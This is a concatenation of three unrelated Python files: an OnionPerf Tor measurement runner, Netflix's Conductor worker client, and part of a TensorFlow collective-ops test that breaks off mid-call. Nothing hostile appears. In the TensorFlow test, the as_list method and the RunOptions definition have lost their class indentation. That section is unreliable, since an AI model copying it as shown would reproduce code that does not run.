            # we collected no exit code, so it is still running
            subp.terminate()
            subp.wait()
        elif done_ev.is_set():
            logging.info("command '{}' finished as expected".format(cmd))
        else:
            logging.warning("command '{}' finished before expected".format(cmd))
            now = time.time()
            # remove failures that happened more than an hour ago
            while len(failure_times) > 0 and failure_times[0] < (now-3600.0):
                failure_times.pop(0)
            # add a new failure that just occurred
            failure_times.append(now)
            pause_time_seconds = 30
        # the subp should be stopped now, flush any remaining lines
        #subp.stdout.close() # results in concurrent write error
        # the helper should stop since stdout was closed
        t.join()
        # helper thread is done, make sure we drain the remaining lines from the stdout queue
        while not stdout_q.empty():
            writable.write(stdout_q.get_nowait())
        # if we have too many failures, exit the watchdog to propogate the error up
        if len(failure_times) > 10:
            break
        # now loop around: either the master asked us to stop, or the subp died and we relaunch it
    # too many failures, or master asked us to stop, close the writable before exiting thread
    writable.close()
def logrotate_thread_task(writables, tgen_writable, torctl_writable, docroot, nickname, done_ev):
    """
    Once per day (just before midnight UTC) rotates every writable in
    `writables`, rotates the tgen/torctl logs and runs the analysis
    pipeline over them, then refreshes the docroot index. Polls
    `done_ev` every second so it can shut down promptly.
    """
    next_midnight = None
    while not done_ev.wait(1):
        # get time
        utcnow = datetime.datetime.utcnow()
        # setup the next expiration time (midnight tonight)
        if next_midnight is None:
            next_midnight = datetime.datetime(utcnow.year, utcnow.month, utcnow.day, 23, 59, 59)
            # make sure we are not already past the above time today
            if (next_midnight - utcnow).total_seconds() < 0:
                next_midnight -= datetime.timedelta(1)  # subtract 1 day
        # if we are past midnight, launch the rotate task
        if (next_midnight - utcnow).total_seconds() < 0:
            # handle the general writables we are watching
            for w in writables:
                w.rotate_file(filename_datetime=next_midnight)
            # handle tgen and tor writables specially, and do analysis
            if tgen_writable is not None or torctl_writable is not None:
                try:
                    # get our public ip address, do this every night in case it changes
                    public_measurement_ip_guess = util.get_ip_address()
                    # set up the analysis object with our log files
                    anal = analysis.Analysis(nickname=nickname, ip_address=public_measurement_ip_guess)
                    if tgen_writable is not None:
                        anal.add_tgen_file(tgen_writable.rotate_file(filename_datetime=next_midnight))
                    if torctl_writable is not None:
                        anal.add_torctl_file(torctl_writable.rotate_file(filename_datetime=next_midnight))
                    # run the analysis, i.e. parse the files
                    anal.analyze(do_simple=False, date_filter=next_midnight.date())
                    # save the results in onionperf and torperf format in the twistd docroot
                    anal.save(output_prefix=docroot, do_compress=True)
                    anal.export_torperf_version_1_1(output_prefix=docroot, do_compress=False)
                    # update the xml index in docroot
                    generate_docroot_index(docroot)
                except Exception as e:
                    logging.warning("Caught and ignored exception in TorPerf log parser: {0}".format(repr(e)))
                    logging.warning("Formatted traceback: {0}".format(traceback.format_exc()))
            # reset our timer
            next_midnight = None
class Measurement(object):
    """
    Coordinates one OnionPerf measurement run: launches and watches the
    helper processes (TGen client/server, Tor client/server, twistd web
    server), starts a nightly log rotation/analysis thread, and cleans
    everything up on shutdown.
    """
    def __init__(self, tor_bin_path, tgen_bin_path, twistd_bin_path, datadir_path, nickname):
        """
        :param tor_bin_path: path to the tor executable to launch
        :param tgen_bin_path: path to the tgen executable to launch
        :param twistd_bin_path: path to the twistd executable to launch
        :param datadir_path: directory under which all process data and logs are kept
        :param nickname: identifier embedded in the nightly analysis output
        """
        self.tor_bin_path = tor_bin_path
        self.tgen_bin_path = tgen_bin_path
        self.twistd_bin_path = twistd_bin_path
        self.datadir_path = datadir_path
        self.nickname = nickname
        self.threads = None  # helper threads; populated in run()
        self.done_event = None  # signals helper threads to shut down; set in run()
        self.hs_service_id = None  # ephemeral onion service id, set in onion mode only
        self.twisted_docroot = None  # docroot served by twistd; set in __start_twistd()
    def run(self, do_onion=True, do_inet=True, client_tgen_listen_port=58888, client_tgen_connect_ip='0.0.0.0', client_tgen_connect_port=8080, client_tor_ctl_port=59050, client_tor_socks_port=59000,
            server_tgen_listen_port=8080, server_tor_ctl_port=59051, server_tor_socks_port=59001, twistd_port=50080):
        '''
        Bootstrap all helper processes, then loop with an hourly heartbeat
        until a component dies or CTRL-C is pressed.
        only `server_tgen_listen_port` and `twistd_port` are "public" and need to be opened on the firewall.
        if `client_tgen_connect_port` != `server_tgen_listen_port`, then you should have installed a forwarding rule in the firewall.
        all ports need to be unique though, and unique among multiple onionperf instances.
        here are some sane defaults:
        client_tgen_listen_port=58888, client_tgen_connect_port=8080, client_tor_ctl_port=59050, client_tor_socks_port=59000,
        server_tgen_listen_port=8080, server_tor_ctl_port=59051, server_tor_socks_port=59001, twistd_port=50080
        '''
        self.threads = []
        self.done_event = threading.Event()
        # if ctrl-c is pressed, shutdown child processes properly
        try:
            # make sure stem and Tor supports ephemeral HS (version >= 0.2.7.1-alpha)
            # and also the NEWNYM mode that clears descriptor cache (version >= 0.2.7.3-rc)
            if do_onion:
                try:
                    tor_version = get_system_tor_version(self.tor_bin_path)
                    if tor_version < Requirement.ADD_ONION or tor_version < Version('0.2.7.3-rc'): # ADD_ONION is a stem 1.4.0 feature
                        logging.warning("OnionPerf in onion mode requires Tor version >= 0.2.7.3-rc, you have {0}, aborting".format(tor_version))
                        return
                except:
                    # bare except: any failure above (e.g. missing Requirement.ADD_ONION)
                    # is treated as "stem too old"; `stem_version` is presumably imported
                    # at module top -- confirm it is in scope.
                    logging.warning("OnionPerf in onion mode requires stem version >= 1.4.0, you have {0}, aborting".format(stem_version))
                    return
            logging.info("Bootstrapping started...")
            logging.info("Log files for the client and server processes will be placed in {0}".format(self.datadir_path))
            general_writables = []
            tgen_client_writable, torctl_client_writable = None, None
            if do_onion or do_inet:
                general_writables.append(self.__start_tgen_server(server_tgen_listen_port))
            if do_onion:
                # the server-side tor also publishes the ephemeral onion service,
                # mapping the client's connect port to the tgen server's listen port
                tor_writable, torctl_writable = self.__start_tor_server(server_tor_ctl_port, server_tor_socks_port, {client_tgen_connect_port:server_tgen_listen_port})
                general_writables.append(tor_writable)
                general_writables.append(torctl_writable)
            if do_onion or do_inet:
                tor_writable, torctl_client_writable = self.__start_tor_client(client_tor_ctl_port, client_tor_socks_port)
                general_writables.append(tor_writable)
            server_urls = []
            if do_onion and self.hs_service_id is not None:
                server_urls.append("{0}.onion:{1}".format(self.hs_service_id, client_tgen_connect_port))
            if do_inet:
                connect_ip = client_tgen_connect_ip if client_tgen_connect_ip != '0.0.0.0' else util.get_ip_address()
                server_urls.append("{0}:{1}".format(connect_ip, client_tgen_connect_port))
            if do_onion or do_inet:
                assert len(server_urls) > 0
                tgen_client_writable = self.__start_tgen_client(server_urls, client_tgen_listen_port, client_tor_socks_port)
                general_writables.append(self.__start_twistd(twistd_port))
                self.__start_log_processors(general_writables, tgen_client_writable, torctl_client_writable)
                logging.info("Bootstrapping finished, entering heartbeat loop")
                time.sleep(1)
                while True:
                    # TODO add status update of some kind? maybe the number of files in the twistd directory?
                    # logging.info("Heartbeat: {0} downloads have completed successfully".format(self.__get_download_count(tgen_client_writable.filename)))
                    if self.__is_alive():
                        logging.info("All helper processes seem to be alive :)")
                    else:
                        logging.warning("Some parallel components failed too many times or have died :(")
                        logging.info("We are in a broken state, giving up and exiting now")
                        break
                    logging.info("Next main process heartbeat is in 1 hour (helper processes run on their own schedule)")
                    logging.info("press CTRL-C for graceful shutdown...")
                    time.sleep(3600)
            else:
                logging.info("No measurement mode set, nothing to do")
        except KeyboardInterrupt:
            logging.info("Interrupt received, please wait for graceful shutdown")
            self.__is_alive()
        finally:
            logging.info("Cleaning up child processes now...")
            if self.hs_service_id is not None:
                try:
                    with Controller.from_port(port=self.hs_control_port) as torctl:
                        torctl.authenticate()
                        torctl.remove_ephemeral_hidden_service(self.hs_service_id)
                except: pass # this fails to authenticate if tor proc is dead
            # logging.disable(logging.INFO)
            self.done_event.set()
            for t in self.threads:
                logging.info("Joining {0} thread...".format(t.getName()))
                t.join()
            time.sleep(1)
            # logging.disable(logging.NOTSET)
            logging.info("Child processes terminated")
            logging.info("Child process cleanup complete!")
            logging.info("Exiting")
    def __start_log_processors(self, general_writables, tgen_writable, torctl_writable):
        """Start the nightly log rotation/analysis helper thread."""
        # rotate the log files, and then parse out the torperf measurement data
        logrotate_args = (general_writables, tgen_writable, torctl_writable, self.twisted_docroot, self.nickname, self.done_event)
        logrotate = threading.Thread(target=logrotate_thread_task, name="logrotate", args=logrotate_args)
        logrotate.start()
        self.threads.append(logrotate)
    def __start_tgen_client(self, server_urls, tgen_port, socks_port):
        """Launch a TGen client that downloads from `server_urls` via the local SOCKS port."""
        return self.__start_tgen("client", tgen_port, socks_port, server_urls)
    def __start_tgen_server(self, tgen_port):
        """Launch a TGen server listening on `tgen_port`."""
        return self.__start_tgen("server", tgen_port)
    def __start_tgen(self, name, tgen_port, socks_port=None, server_urls=None):
        """
        Write a TGen config and start the process under a watchdog thread.
        With `socks_port` set it runs the Torperf client model, otherwise a
        plain listen (server) model. Returns the FileWritable for its log.
        """
        logging.info("Starting TGen {0} process on port {1}...".format(name, tgen_port))
        tgen_datadir = "{0}/tgen-{1}".format(self.datadir_path, name)
        if not os.path.exists(tgen_datadir): os.makedirs(tgen_datadir)
        tgen_confpath = "{0}/tgen.graphml.xml".format(tgen_datadir)
        if os.path.exists(tgen_confpath): os.remove(tgen_confpath)
        if socks_port is None:
            model.ListenModel(tgen_port="{0}".format(tgen_port)).dump_to_file(tgen_confpath)
            logging.info("TGen server running at 0.0.0.0:{0}".format(tgen_port))
        else:
            model.TorperfModel(tgen_port="{0}".format(tgen_port), tgen_servers=server_urls, socksproxy="127.0.0.1:{0}".format(socks_port)).dump_to_file(tgen_confpath)
        tgen_logpath = "{0}/onionperf.tgen.log".format(tgen_datadir)
        tgen_writable = util.FileWritable(tgen_logpath)
        logging.info("Logging TGen {1} process output to {0}".format(tgen_logpath, name))
        tgen_cmd = "{0} {1}".format(self.tgen_bin_path, tgen_confpath)
        tgen_args = (tgen_cmd, tgen_datadir, tgen_writable, self.done_event, None, None, None)
        tgen_watchdog = threading.Thread(target=watchdog_thread_task, name="tgen_{0}_watchdog".format(name), args=tgen_args)
        tgen_watchdog.start()
        self.threads.append(tgen_watchdog)
        return tgen_writable
    def __start_twistd(self, twistd_port):
        """
        Start a twistd web server (under a watchdog thread) serving the
        docroot where nightly analysis results are published.
        Returns the FileWritable for its log.
        """
        logging.info("Starting Twistd server process on port {0}...".format(twistd_port))
        twisted_datadir = "{0}/twistd".format(self.datadir_path)
        if not os.path.exists(twisted_datadir): os.makedirs(twisted_datadir)
        twisted_logpath = "{0}/onionperf.twisted.log".format(twisted_datadir)
        twisted_writable = util.FileWritable(twisted_logpath)
        logging.info("Logging Twisted process output to {0}".format(twisted_logpath))
        twisted_docroot = "{0}/docroot".format(twisted_datadir)
        if not os.path.exists(twisted_docroot): os.makedirs(twisted_docroot)
        generate_docroot_index(twisted_docroot)
        self.twisted_docroot = twisted_docroot
        twisted_cmd = "{0} -n -l - web --port {1} --path {2} --mime-type=None".format(self.twistd_bin_path, twistd_port, twisted_docroot)
        twisted_args = (twisted_cmd, twisted_datadir, twisted_writable, self.done_event, None, None, None)
        twisted_watchdog = threading.Thread(target=watchdog_thread_task, name="twistd_watchdog", args=twisted_args)
        twisted_watchdog.start()
        self.threads.append(twisted_watchdog)
        logging.info("Twistd web server running at 0.0.0.0:{0}".format(twistd_port))
        return twisted_writable
    def __start_tor_client(self, control_port, socks_port):
        """Launch the client-side tor process."""
        return self.__start_tor("client", control_port, socks_port)
    def __start_tor_server(self, control_port, socks_port, hs_port_mapping):
        """Launch the server-side tor process and publish an ephemeral onion service."""
        return self.__start_tor("server", control_port, socks_port, hs_port_mapping)
    def __start_tor(self, name, control_port, socks_port, hs_port_mapping=None):
        """
        Start a tor process (config fed via stdin) under a watchdog thread,
        wait for it to bootstrap, attach a control-port monitor thread, and
        optionally create an ephemeral hidden service from `hs_port_mapping`.
        Returns (tor_writable, torctl_writable) for the two log files.
        """
        logging.info("Starting Tor {0} process with ControlPort={1}, SocksPort={2}...".format(name, control_port, socks_port))
        tor_datadir = "{0}/tor-{1}".format(self.datadir_path, name)
        if not os.path.exists(tor_datadir): os.makedirs(tor_datadir)
        tor_config_template = "ORPort 0\nDirPort 0\nControlPort {0}\nSocksPort {1}\nSocksListenAddress 127.0.0.1\nClientOnly 1\n\
WarnUnsafeSocks 0\nSafeLogging 0\nMaxCircuitDirtiness 60 seconds\nUseEntryGuards 0\nDataDirectory {2}\nLog INFO stdout\n"
        tor_config = tor_config_template.format(control_port, socks_port, tor_datadir)
        tor_logpath = "{0}/onionperf.tor.log".format(tor_datadir)
        tor_writable = util.FileWritable(tor_logpath)
        logging.info("Logging Tor {0} process output to {1}".format(name, tor_logpath))
        # from stem.process import launch_tor_with_config
        # tor_subp = launch_tor_with_config(tor_config, tor_cmd=self.tor_bin_path, completion_percent=100, init_msg_handler=None, timeout=None, take_ownership=False)
        tor_cmd = "{0} -f -".format(self.tor_bin_path)  # "-f -" reads torrc from stdin
        tor_stdin_bytes = str_tools._to_bytes(tor_config)
        tor_ready_str = "Bootstrapped 100"
        tor_ready_ev = threading.Event()
        tor_args = (tor_cmd, tor_datadir, tor_writable, self.done_event, tor_stdin_bytes, tor_ready_str, tor_ready_ev)
        tor_watchdog = threading.Thread(target=watchdog_thread_task, name="tor_{0}_watchdog".format(name), args=tor_args)
        tor_watchdog.start()
        self.threads.append(tor_watchdog)
        # wait until Tor finishes bootstrapping
        tor_ready_ev.wait()
        torctl_logpath = "{0}/onionperf.torctl.log".format(tor_datadir)
        torctl_writable = util.FileWritable(torctl_logpath)
        logging.info("Logging Tor {0} control port monitor output to {1}".format(name, torctl_logpath))
        # give a few seconds to make sure Tor had time to start listening on the control port
        time.sleep(3)
        # monitor all supported control events except the plain log-level ones
        torctl_events = [e for e in monitor.get_supported_torctl_events() if e not in ['DEBUG', 'INFO', 'NOTICE', 'WARN', 'ERR']]
        newnym_interval_seconds = 300
        torctl_args = (control_port, torctl_writable, torctl_events, newnym_interval_seconds, self.done_event)
        torctl_helper = threading.Thread(target=monitor.tor_monitor_run, name="torctl_{0}_helper".format(name), args=torctl_args)
        torctl_helper.start()
        self.threads.append(torctl_helper)
        if hs_port_mapping is not None:
            logging.info("Creating ephemeral hidden service...")
            with Controller.from_port(port=control_port) as torctl:
                torctl.authenticate()
                response = torctl.create_ephemeral_hidden_service(hs_port_mapping, detached=True, await_publication=True)
                self.hs_service_id = response.service_id
                # remember which control port owns the service so cleanup can remove it
                self.hs_control_port = control_port
            logging.info("Ephemeral hidden service is available at {0}.onion".format(response.service_id))
        return tor_writable, torctl_writable
    def __get_download_count(self, tgen_logpath):
        """Count completed transfers recorded in the given tgen log file."""
        count = 0
        if tgen_logpath is not None and os.path.exists(tgen_logpath):
            with open(tgen_logpath, 'r') as fin:
                for line in fin:
                    if re.search("transfer-complete", line) is not None:
                        count += 1
        return count
    def __is_alive(self):
        """Log the liveness of each helper thread; return True only if all are alive."""
        all_alive = True
        for t in self.threads:
            t_name = t.getName()
            if t.is_alive():
                logging.info("{0} is alive".format(t_name))
            else:
                logging.warning("{0} is dead!".format(t_name))
                all_alive = False
        return all_alive
|
ConductorWorker.py | #
# Copyright 2017 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
import sys
import time
from conductor.conductor import WFClientMgr
from threading import Thread
import socket
from enum import Enum
# Hostname of this machine; used as the default worker_id for workers.
hostname = socket.gethostname()
class TaskStatus(Enum):
    """States a worker can report a Conductor task in."""
    IN_PROGRESS = 'IN_PROGRESS'
    FAILED = 'FAILED'
    FAILED_WITH_TERMINAL_ERROR = 'FAILED_WITH_TERMINAL_ERROR'
    COMPLETED = 'COMPLETED'

    def __str__(self):
        # Render as the raw status string the server expects.
        return self.value
class ConductorWorker:
    """
    Main class for implementing Conductor Workers

    A conductor worker is a separate system that polls the conductor
    server for queued tasks and executes them; it may run on the same
    instance as the server or remotely.

    Each task is handled by a user-supplied function that must return a
    `dict` containing the `status`, `output` and `logs` keys. If any of
    those keys is missing, the task is reported as failed.

    Use the start method to begin continuous polling. One script can run
    several workers via repeated start calls; see start for how the
    `wait` flag controls blocking.
    """

    def __init__(self, server_url, thread_count, polling_interval, worker_id=None, headers=None):
        """
        Parameters
        ----------
        server_url: str
            The url to the server hosting the conductor api.
            Ex: 'http://localhost:8080/api'
        thread_count: int
            The number of threads that will be polling for and
            executing tasks in case of using the start method.
        polling_interval: float
            The number of seconds that each worker thread will wait
            between polls to the conductor server.
        worker_id: str, optional
            Identifier reported to the server for this worker.
            Defaults to the machine's hostname.
        headers: dict, optional
            Extra HTTP headers forwarded to the conductor clients.
        """
        client_mgr = WFClientMgr(server_url, headers=headers)
        self.workflowClient = client_mgr.workflowClient
        self.taskClient = client_mgr.taskClient
        self.thread_count = thread_count
        self.polling_interval = polling_interval
        self.worker_id = worker_id or hostname

    @staticmethod
    def task_result(status: TaskStatus, output=None, logs=None, reasonForIncompletion=None):
        """
        Build a task-result dict in the shape the conductor server expects.

        Parameters
        ----------
        status: TaskStatus
            The status of the task, e.g. TaskStatus.COMPLETED
        output: dict, optional
            Results of task processing; defaults to an empty dict.
        logs: list, optional
            Log entries to attach; defaults to an empty list.
        reasonForIncompletion: str, optional
            The reason for not completing the task, if any.
        """
        result = {
            'status': str(status),
            'output': {} if output is None else output,
            'logs': [] if logs is None else logs,
        }
        if reasonForIncompletion:
            result['reasonForIncompletion'] = reasonForIncompletion
        return result

    def execute(self, task, exec_function):
        """Run `exec_function` on `task` and push the outcome to the server."""
        try:
            response = exec_function(task)
            # Enforce the executor contract: a plain dict with the three keys.
            if type(response) is not dict or not all(key in response for key in ('status', 'output', 'logs')):
                raise Exception('Task execution function MUST return a response as a dict with status, output and logs fields')
            task['status'] = response['status']
            task['outputData'] = response['output']
            task['logs'] = response['logs']
            if 'reasonForIncompletion' in response:
                task['reasonForIncompletion'] = response['reasonForIncompletion']
            self.taskClient.updateTask(task)
        except Exception as err:
            # Report any executor failure back to the server as a FAILED task.
            print(f'Error executing task: {exec_function.__name__} with error: {str(err)}')
            task['status'] = 'FAILED'
            task['outputData'] = {'error-message': str(err)}
            self.taskClient.updateTask(task)

    def poll_and_execute(self, taskType, exec_function, domain=None):
        """Poll the server forever, acking and executing each task received."""
        while True:
            time.sleep(float(self.polling_interval))
            queued_task = self.taskClient.pollForTask(taskType, self.worker_id, domain)
            if queued_task is None:
                continue
            self.taskClient.ackTask(queued_task['taskId'], self.worker_id)
            self.execute(queued_task, exec_function)

    def start(self, taskType, exec_function, wait, domain=None):
        """
        Begin continuous polling of the conductor server.

        Parameters
        ----------
        taskType: str
            The name of the task that the worker is looking to execute
        exec_function: function
            The function that the worker will execute. It must return a
            dict with the `status`, `output` and `logs` keys present;
            otherwise an Exception will be raised.
        wait: bool
            Whether this call blocks forever. The polling threads are
            daemons, so when the program exits they are destroyed: the
            last start call in a program must pass wait=True to keep the
            process alive, while earlier calls should pass wait=False.
        domain: str, optional
            The task domain under which the worker runs; see the
            conductor server documentation. Defaults to None.
        """
        print('Polling for task %s at a %f ms interval with %d threads for task execution, with worker id as %s' % (taskType, self.polling_interval * 1000, self.thread_count, self.worker_id))
        for _ in range(int(self.thread_count)):
            poller = Thread(target=self.poll_and_execute, args=(taskType, exec_function, domain,))
            poller.daemon = True
            poller.start()
        if wait:
            while True:
                time.sleep(1)
def exc(taskType, inputData, startTime, retryCount, status, callbackAfterSeconds, pollCount):
    """Demo task executor: print a note and report immediate success."""
    print('Executing the function')
    result = {'status': 'COMPLETED', 'output': {}, 'logs': []}
    return result
def main():
    """Run two demo workers against a local Conductor server.

    Task types come from argv[1] and argv[2]; only the second start call
    blocks (wait=True) so both workers stay alive.
    """
    worker = ConductorWorker('http://localhost:8080/api', 5, 0.1)
    worker.start(sys.argv[1], exc, False)
    worker.start(sys.argv[2], exc, True)
# Script entry point: expects the two worker task types on the command line.
if __name__ == '__main__':
    main()
|
cross_device_ops_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
# Short aliases for classes used throughout this test module.
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices
def make_per_replica_value(value, devices):
  """Creates a `PerReplica` object whose values reside in `devices`.

  Args:
    value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
      that takes one argument (`device_idx`) and should return the value that
      is going to be created on devices[device_idx].
    devices: a list of device strings to create `PerReplica` values on.

  Returns:
    A `PerReplica` object.
  """

  def resolve(device_idx):
    # Pick the payload destined for the device at `device_idx`.
    if callable(value):
      return value(device_idx)
    if isinstance(value, list):
      return value[device_idx]
    return value

  per_device = []
  for device_idx, device in enumerate(devices):
    payload = resolve(device_idx)
    with ops.device(device):
      if isinstance(payload, IndexedSlicesValue):
        # Copy each component onto the target device.
        per_device.append(
            IndexedSlices(
                values=array_ops.identity(payload.values),
                indices=array_ops.identity(payload.indices),
                dense_shape=array_ops.identity(payload.dense_shape)))
      else:
        per_device.append(array_ops.identity(payload))
  return value_lib.PerReplica(per_device)
def enable_collective_ops():
  """Enable collectives in the current process.

  Configures the eager context with a collective leader, starts a server
  using the cluster spec resolved by `TFConfigClusterResolver`, and resets
  the `CollectiveReplicaLauncher` class flags to their defaults so earlier
  tests cannot leak flag state into later ones.
  """
  cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
  context.context().configure_collective_ops(
      collective_leader="'/job:worker/replica:0/task:0'")
  config_proto = config_pb2.ConfigProto()
  config_proto.experimental.collective_group_leader = (
      "/job:worker/replica:0/task:0")
  server_def = tensorflow_server_pb2.ServerDef(
      cluster=cluster_resolver.cluster_spec().as_cluster_def(),
      default_session_config=config_proto,
      job_name=cluster_resolver.task_type,
      task_index=cluster_resolver.task_id,
      protocol=cluster_resolver.rpc_layer)
  context.context().enable_collective_ops(server_def)
  # Recover default flag values.
  CollectiveReplicaLauncher._prefer_unique_instance_key = True
  CollectiveReplicaLauncher._prefer_ordering_token = False
class MultiProcessPoolRunner():
  """Thin wrapper that owns a `multi_process_runner.MultiProcessPoolRunner`
  backed by a freshly created cluster spec."""

  def __init__(self, num_processes):
    # One worker process per participant; expose the underlying runner.
    spec = multi_worker_test_base.create_cluster_spec(
        num_workers=num_processes)
    self.runner = multi_process_runner.MultiProcessPoolRunner(spec)
# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# usually fn usually captures the test class instance, and test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)  # shared 2-process pool
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)  # shared 1-process pool
def get_global_mpr(num_processes):
  """Return the shared pool runner for `num_processes` worker processes.

  Raises:
    ValueError: if `num_processes` is not 1 or 2 (only those pools exist).
  """
  if num_processes not in (1, 2):
    raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
                     num_processes)
  return (global_mpr_1p if num_processes == 1 else global_mpr_2p).runner
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
  def setUp(self):
    """Reset collective ops in every pool process before each test."""
    super().setUp()
    # Enabling collectives can be done in "setUpClass", but requires using
    # different collective_keys in different tests as collectives are reused
    # across tests. Always resetting collective ops before each test offers
    # better test isolation.
    global_mpr_1p.runner.run(enable_collective_ops)
    global_mpr_2p.runner.run(enable_collective_ops)
  def make_collective(self, num_processes, gpu_per_process):
    """Returns collectives and other info to be used in tests.

    Args:
      num_processes: an integer indicating the number of processes that
        participate in the collective.
      gpu_per_process: number of GPUs (0 if no GPUs) used by each process.

    Returns:
      A tuple of (collective, devices, pid) where collective is a instance
      of `CollectiveAllReduce`, devices are a list of local devices (str)
      attached to the current process, and pid is the id of this process among
      all participant processes.
    """

    cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
    devices = [
        "/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
    ]
    if gpu_per_process > 0:
      # GPUs replace (not extend) the CPU device list for this process.
      devices = [
          "/job:worker/replica:0/task:%d/device:GPU:%d" %
          (cluster_resolver.task_id, i) for i in range(gpu_per_process)
      ]
    # Total participants = processes x local devices per process.
    group_size = num_processes * len(devices)
    collective = cross_device_ops_lib.CollectiveAllReduce(
        devices=devices, group_size=group_size)
    return collective, devices, cluster_resolver.task_id
def as_list(self, value):
"""An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.
The reason it exists is to provide a uniformed view of returned value of
"reduce" calls, especially across tf.function boundaries. Returning
`Mirrored` from a tf.function will only evaluate the primary value, which
makes collective ops of non-primary device being pruned, and will eventually
cause hanging.
Args:
value: the value to convert, can be one of `Mirrored`, `Tensor` and
`IndexedSlices`.
Returns:
A list of `Tensor` or `IndexedSlices`.
"""
if isinstance(value, ops.Tensor):
return [value]
elif isinstance(value, IndexedSlices):
return [value]
elif isinstance(value, value_lib.Mirrored):
return value.values
else:
raise ValueError("unwrap: unsupported input type: %s" % type(value))
RunOptions = collections.namedtuple( # pylint: disable=invalid-name
"RunOptions",
[
"mode", # A list of str from ["eager", "func_graph"]
"num_processes",
"gpus_per_process",
"reduce_op",
"communication_options",
"prefer_unique_instance_key",
])
RunOptions.__new__.__defaults__ = (["eager",
"func_graph"], 2, 0, ReduceOp.SUM,
collective_util.Options(), True)
  def reduce_and_verify(self, inputs, expect, options):
    """Reduce the given `inputs` and verify the output matches `expect`.

    Args:
      inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
        fed to i-th replica.
      expect: a `Tensor` or `IndexedSlices`. This should be the expected value
        for one replica.
      options: a `RunOptions` instance.
    """

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          options.prefer_unique_instance_key)
      collective, devices, pid = self.make_collective(options.num_processes,
                                                      options.gpus_per_process)

      def reduce_fn():
        # Each local device picks its slice of the global inputs list.
        value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
        per_replica_value = make_per_replica_value(value_fn, devices)
        # The per-replica value doubles as the destinations argument, so the
        # result is mirrored back onto the same devices.
        reduced_values = collective.reduce(options.reduce_op, per_replica_value,
                                           per_replica_value,
                                           options.communication_options)
        reduced_values = self.as_list(reduced_values)
        self.assertAllEqual(devices, [v.device for v in reduced_values])
        return [ops.convert_to_tensor(v) for v in reduced_values]

      # Every device is expected to hold the same reduced result.
      per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)

      if "eager" in options.mode:
        got = reduce_fn()
        self.assertAllClose(got, per_replica_expect)

      if "func_graph" in options.mode:
        got = def_function.function(reduce_fn)()
        self.assertAllClose(got, per_replica_expect)

    get_global_mpr(options.num_processes).run(replica_fn)
  def batch_reduce_and_verify(self, inputs, expect, options):
    """Batch reduce the given `inputs` and verify the output matches `expect`.

    Args:
      inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
        value will be fed to i-th replica.
      expect: a list of `Tensor` or `IndexedSlices`. This should be the expected
        value for one replica.
      options: a `RunOptions` instance.
    """

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          options.prefer_unique_instance_key)
      collective, devices, pid = self.make_collective(options.num_processes,
                                                      options.gpus_per_process)

      def batch_reduce_fn():
        batch_size = len(inputs[0])
        value_dst_pairs = []
        for i in range(batch_size):

          # `idx=i` binds the loop variable at definition time to avoid the
          # late-binding closure pitfall.
          def value_fn(device_idx, idx=i):
            return inputs[pid * len(devices) + device_idx][idx]

          per_replica_value = make_per_replica_value(value_fn, devices)
          # Each value is also its own destination, mirroring the result.
          value_dst_pairs.append((per_replica_value, per_replica_value))
        reduced_values = collective.batch_reduce(options.reduce_op,
                                                 value_dst_pairs,
